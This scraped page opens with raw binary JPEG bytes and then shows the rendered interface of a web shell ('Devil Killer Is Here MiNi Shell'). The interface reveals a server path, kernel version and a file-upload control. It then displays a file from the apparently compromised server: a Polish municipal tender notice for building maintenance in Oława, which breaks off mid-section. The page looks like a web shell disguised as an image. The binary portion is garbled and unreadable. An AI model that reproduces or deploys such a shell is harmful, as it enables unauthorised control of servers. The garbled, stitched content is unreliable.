JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220223/0006543301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> WYKONYWANIE BIEŻĄCYCH PRAC KONSERWACYJNO-REMONTOWYCH W NIERUCHOMOŚCIACH BĘDĄCYCH WŁASNOŚCIĄ GMINY MIEJSKIEJ OŁAWA. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Oława</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934845</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl.Zamkowy 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oława</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@um.olawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.um.olawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONYWANIE BIEŻĄCYCH PRAC KONSERWACYJNO-REMONTOWYCH W NIERUCHOMOŚCIACH BĘDĄCYCH WŁASNOŚCIĄ GMINY MIEJSKIEJ OŁAWA. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53a8b1b1-947d-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00065433</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021592/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Wykonywanie bieżących prac konserwacyjno-remontowych w nieruchomościach będących własnością gminy miejskiej Oława.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.um.olawa.pl, www.miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal, sekretariat@um.olawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych , elektronicznych kopi dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunków korzystania z elektronicznej platformy usług administracji publicznej ( ePUAP).2. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.3. Za datę przekazania oferty, wniosków , zawiadomień , dokumentów elektronicznych , oświadczeń lub elektronicznych kopi dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 4. Zamawiający przekazuje link do postępowania oraz ID postepowania jako załącznik do niniejszej SWZ. Dane postępowania można również wyszukać na Liście wszystkich postepowań w miniPortalu klikając wcześniej opcje „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">INW.271/6/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonywanie robót remontowych, konserwacyjnych i napraw awaryjnych niezbędnych do utrzymania w stanie odpowiadającym warunkom technicznym użytkowania w administrowanych zasobach mieszkaniowych i innych stanowiących własność Gminy Miasto Oława na podstawie bieżących zleceń. Ilość i zakres prac w trakcie realizacji zamówienia zlecana będzie zgodnie z bieżącymi potrzebami Zamawiającego . Przewidywana wartość robót w okresie 12 miesięcy trwania umowy – 800 000 zł brutto. Środki finansowe na realizację zamówienia w poszczególnych latach tj.2022,2023 będą wydatkowane w wysokościach określonych w budżecie Zamawiającego na dany rok.<br/>Przedmiot zamówienia realizowany będzie w branżach:<br/>- elektrycznej<br/>- instalacyjno- sanitarnej <br/>- ogólno-budowlanej<br/>Roboty w branży elektrycznej.<br/>- konserwacja instalacji elektrycznych w budynkach i lokalach gminnych <br/>- remonty instalacji elektrycznych<br/>- usuwanie awarii<br/>Zakres prac obejmuje m.in.: <br/>a) wymiany instalacji elektrycznej w lokalach mieszkalnych i użytkowych należących do<br/> Gminy Miasto Oława,<br/> b) usuwania awarii ( w godzinach urzędowania Zamawiającego tj.7.30-15.30 od poniedziałku do piątku ) i dokonywania napraw instalacji elektrycznej wraz z wymianą osprzętu elektrycznego w częściach wspólnego użytkowania budynku oraz w lokalach należących do Gminy Miasto Oława,<br/> c) usuwaniu awarii w ramach pogotowia (zaistniałych poza godzinami urzędowania Zamawiającego oraz w soboty , niedziele i święta).<br/> <br/> d) obsłudze technicznej podlegać będą wewnętrzne linie zasilające budynek od górnych zacisków głównych zabezpieczeń wraz z odgałęzieniem przedlicznikowym oraz obwody światła i gniazd wtykowych w pomieszczeniach wspólnego użytku<br/>e)	wymiana żarówek- w częściach wspólnych (kl. schodowa, piwnice, strych, przed wejściem).<br/>f)	naprawa instalacji elektrycznej wraz z włącznikami i oprawami w częściach wspólnych budynków komunalnych.<br/>g)	wymiana lub naprawa tablic licznikowych w lokalach mieszkalnych.<br/>h)	naprawa lub wymiana instalacji elektrycznej bez opraw oświetleniowych.<br/>i)	wymiana lub naprawa zasilania tablic licznikowych.<br/>j)	wymiana luba naprawa zabezpieczeń przedlicznikowych.<br/>k)	sprawdzenie napięcia zerowego w lokalach i naprawa instalacji<br/>l)	usuwanie awarii elektrycznych.<br/>m)	kontrola ,naprawa lub remont instalacji elektrycznej w lokalach do zasiedlenia. <br/><br/>Roboty w branży instalacyjno – sanitarnej. <br/>Przedmiotem zamówienia jest:<br/>- konserwacja , usuwanie awarii ( w godzinach urzędowania zamawiającego tj. w godz.7.30 – 15.30 od poniedziałku do piątku) i dokonywania napraw instalacji wodno- kanalizacyjnej, gazowej, c.o., c.w. w częściach wspólnego użytkowania budynku oraz w lokalach należących do Gminy Miasto Oława<br/>- usuwanie awarii w ramach pogotowia ( zaistniałych poza godzinami urzędowania zamawiającego oraz z soboty, niedziele i święta).<br/>Zakres prac obejmuje m.in.:<br/>a)naprawa, remont i bieżąca konserwacja instalacji wodnej ,<br/>b)naprawa, remont i bieżąca konserwacja instalacji kanalizacyjnej od pierwszej studzienki od strony sieci do odpływu z urządzeń w lokalach, bez przyborów sanitarnych i syfonów,<br/>c)naprawa , remont i bieżąca konserwacja instalacji gazowej od szafki gazowej, aż do urządzeń w lokalu mieszkalnym, bez urządzeń typu kuchenka, junkers,<br/>d)wymiana lub naprawa urządzeń i instalacji w lokalach do zasiedlenia<br/> e)wymiana pieco- kuchni stalowych<br/>f)wymiana i montaż liczników wody wraz z ich plombowaniem<br/><br/>Roboty w branży ogólno-budowlanej.<br/>Przedmiotem zamówienia jest: <br/> - wykonywanie robót remontowo budowlanych w budynkach i lokalach gminnych<br/> - wykonywanie remontów mieszkań do zasiedlenia<br/> Zakres robót obejmuje m.in.:<br/> - naprawa stolarki drzwiowej i okiennej<br/> - naprawa wymiana zamków i samozamykaczy.<br/>- wykonywanie remontów klatek schodowych<br/>montaż pieców kuchennych <br/>wymiana kratek wentylacyjnych <br/>naprawy czap kominowych<br/>wymiana i uzupełnianie nasad kominowych<br/>uzupełnianie i spoinowanie zewnętrzne kominów<br/>uszczelnianie przewodów i przemurowanie kominów<br/>w uzasadnionych sytuacjach informowanie Zamawiającego o konieczności wykonania opinii kominiarskiej<br/>prace stolarskie<br/>drobne naprawy i remonty w pomieszczeniach wspólnego użytku<br/>uzupełnianie ubytków tynków<br/>miejscowe naprawy elewacji z malowaniem<br/>naprawy konstrukcji balkonów<br/>zamurowywanie otworów w stropach<br/>uzupełnianie tynków po pracach instalacyjnych<br/>białkowanie piwnic, pralni, suszarni<br/>wymiana drzwi i stolarki okiennej<br/>wymiana i naprawy podłóg w lokalach<br/>remonty lokali<br/>miejscowe naprawy dachów<br/>częściowe naprawy i czyszczenie rynien<br/>naprawa włazów dachowych, ław kominowych, zabezpieczeń przeciwśniegowych, drabin strychowych, naświetli i krat piwnicznych<br/><br/>UWAGA.<br/><br/>Zamawiający informuje, że dokładna wartość robót do wykonania zależna będzie od faktycznego zapotrzebowania i wielkości posiadanych środków finansowych na ten cel. Przewidywana wartość umowy w okresie trwania umowy – do 800 000 zł brutto. Miejscem realizacji zamówienia jest teren miasta Oława.<br/>Elementy wynagrodzenia Wykonawcy: wynagrodzenie za wykonane każdorazowo zlecenie obliczona w oparciu o cenę jednej roboczogodziny wraz z narzutami podanymi w ofercie , cenę sprzętu i materiałów zgodnych z zasadami ich stosowania określonych w umowie wraz z narzutami podanymi w ofercie , wynagrodzenie ryczałtowe, comiesięczne za pogotowie ( pełnienie dyżurów całodobowych). <br/>Przez pojęcie „ pogotowie ( pełnienie dyżurów całodobowych)” należy rozumieć gotowość Wykonawcy do niezwłocznego i skutecznego usunięcia zgłoszonej awarii zaistniałej poza godzinami urzędowania Zamawiającego ( 7.30- 15.30) oraz w soboty , niedziele i święta. Sposób zgłaszania i dokumentowania awarii ustalony zostanie pomiędzy Stronami w formie protokołu Wykonawca winien w terminie nie dłuższym niż 0,5 godziny podjąć działanie zmierzające do usunięcia awarii co należy rozumieć, że Wykonawca w ciągu 0,5 godziny od momentu powiadomienia przystąpi do usuwania awarii. Przekroczenia tego terminu skutkować będzie naliczeniem kary umownej. <br/>Wynagrodzenie za pogotowie( pełnienie dyżurów całodobowych) obejmuje pełnienie całodobowej gotowości przez 7 dni w tygodniu i obejmuje wszelkie koszty związane z usunięciem zgłoszonej awarii w tym koszty transportu , robocizny, materiałów itp. z wyłączeniem kosztów sprzętu specjalistycznego. <br/>Podczas usuwania awarii zaistniałych poza godzinami urzędowania Zamawiającego należy wykonać jedynie doraźne prace, które zabezpieczą przed powiększaniem uszkodzenia czy zagrożenia. Wykonane prace zabezpieczające nie mogą spowodować całkowitego wstrzymania dostaw mediów ( woda, kanalizacja, energia elektryczna, energia cieplna) do lokali w obiekcie.<br/>Jeżeli charakter i zakres awarii nie pozwala na jej szybkie usunięcie Zamawiający dopuszcza możliwość odcięcia danego medium w całym obiekcie lub jego części po telefonicznym uzgodnieniu z uprawnionym przedstawicielem Zamawiającego. <br/>Wykonanie prac kompleksowo eliminujących awarię i jej skutki będzie przedmiotem osobnego zlecenia. Użycie specjalistycznego sprzętu ( m.in. podnośnik koszowy , WUKO, beczkowóz) wymagać będzie każdorazowo zgody Zamawiającego ( zgoda udzielona przez telefon) a koszt jego ewentualnego użycia uwzględniony będzie w koszcie osobnego zlecenia na kompleksową eliminację awarii i jej skutków.<br/>W przypadku gdy Wykonawca nie odbierze od zamawiającego w ciągu 30 minut telefonu alarmowego , Zamawiający ma prawo zlecić usunięcia awarii innej firmie i obciążyć Wykonawcę wszelkimi kosztami z tym związanymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</p> <p class="mb-0">50711000-2 - Usługi w zakresie napraw i konserwacji elektrycznych instalacji budynkowych</p> <p class="mb-0">50720000-8 - Usługi w zakresie napraw i konserwacji centralnego ogrzewania</p> <p class="mb-0">98395000-8 - Usługi ślusarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postepowania dotyczące:<br/>Sytuacji ekonomicznej i finansowej.<br/>Wykonawca spełnia warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej przedmiotem zamówienia na kwotę nie mniejszą niż 300 000 złotych( lub równowartość tej kwoty w przypadku walut innych niż złoty polski obliczoną przy uwzględnieniu średniego kursu waluty obcej podanej przez Narodowy Bank Polski z dnia publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych) <br/>W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w/w warunek spełniać winien co najmniej jeden z wykonawców.<br/>Zdolności technicznej lub zawodowej.<br/> <br/>1.Wykonawca spełnia warunek, jeżeli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedno zamówienie polegające na obsłudze technicznej zasobu mieszkaniowego obejmującego co najmniej 50 budynków mieszkalnych, wielorodzinnych, o wartości min. 400 000 zł brutto( w ramach jednej umowy). Przez obsługę techniczną zasobu mieszkaniowego należy rozumieć wykonywanie robót remontowych, konserwacyjnych i napraw awaryjnych niezbędnych do utrzymania obiektu w stanie odpowiadającym warunkom technicznym użytkowania w branży elektrycznej, instalacyjno- sanitarnej i ogólno-budowlanej<br/>i<br/>2.Warunek zostanie uznany za spełniony, jeżeli Wykonawca dysponuje :<br/>- co najmniej 1 osobą posiadającą aktualne świadectwo kwalifikacyjne E do 1 kV ( lub wyższe) <br/>- co najmniej 1 osobą posiadającą aktualne świadectwo kwalifikacyjne E uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci gazowych . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę , którego oferta została oceniona najwyżej , do złożenia w wyznaczonym terminie , nie krótszym niż 5 dni od dnia wezwania podmiotowych środków dowodowych tj:<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie , wraz z podaniem ich rodzaju , wartości , daty i miejsca wykonania oraz podmiotów , na rzecz których roboty te zostały wykonane oraz załączeniem dowodów określających , czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot , na rzecz którego roboty zostały wykonane,, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty<br/>- dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>- wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi , wraz z informacjami na temat ich kwalifikacji zawodowych ,uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego , a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta musi być zabezpieczona wadium w wysokości 2000 PLN (słownie: dwa tysiące złotych).<br/>Wadium należy wnieść w terminie do dnia 10.03.2022r. do godz. 10.00 .<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą , z wyjątkiem przypadków , o których mowa w art.98 ust.1 pkt 2 i 3 oraz ust. 2 uPzp.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>- pieniądzu<br/>- gwarancjach bankowych <br/>- gwarancjach ubezpieczeniowych<br/>- poręczeniach udzielanych przez podmioty , o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2019r. poz.310,836 i 1572)<br/>Wadium wnoszone w formie pieniądza wpłaca się przelewem na rachunek bankowy zamawiającego : <br/> - Bank Spółdzielczy w Oławie, nr konta 92 9585 0007 0010 0016 7716 0030 <br/> Na poleceniu przelewu umieścić adnotację „ Wadium – przetarg- prace konserwacyjno-remontowe ”.<br/> Wadium w formie pieniądza musi się znajdować fizycznie na koncie Zamawiającego najdalej w dniu 10.03.2022r. o godz. 10.00<br/><br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art.97 ust.7 pkt 2-4 wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia , w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) 